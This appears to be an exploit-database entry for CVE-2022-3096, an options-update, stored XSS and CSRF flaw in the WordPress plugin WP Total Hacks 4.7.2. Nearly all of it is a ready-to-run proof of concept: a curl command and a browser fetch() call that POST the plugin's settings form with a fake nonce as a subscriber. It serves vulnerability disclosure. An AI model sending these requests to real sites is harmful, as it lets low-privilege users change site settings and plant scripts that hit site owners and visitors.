CVE: CVE-2022-3096
Name: WP Total Hacks (wp-total-hacks)
Version: 4.7.2
Date: 2022-04-01 19:56:10
Advisory: https://wpscan.com/vulnerability/46996537-a874-4b2e-9cd7-7d0832f9704d
Type: Authenticated Options Update, Stored XSS, CSRF
Exploit:
Log in as subscriber and send a request, no permissions or capability checks and no further sanitizations are done.
Also allows Stored XSS.
curl "https://example.com/wp-admin/"
-X POST
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
-H "Accept-Language: de,en;q=0.7,en-US;q=0.3"
-H "Accept-Encoding: gzip, deflate"
-H "Referer: https://example.com/wp-admin/"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Upgrade-Insecure-Requests: 1"
-H "Origin: https://example.com"
-H "DNT: 1"
-H "Connection: keep-alive"
-H "Cookie: wordpress_..."
-H "Sec-Fetch-Dest: empty"
-H "Sec-Fetch-Mode: cors"
-H "Sec-Fetch-Site: same-origin"
--data-raw "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern"
await fetch("https://example.com/wp-admin/", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "de,en;q=0.7,en-US;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1"
},
"referrer": "https://example.com/wp-admin/",
"body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=
&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
"method": "POST",
"mode": "cors"
});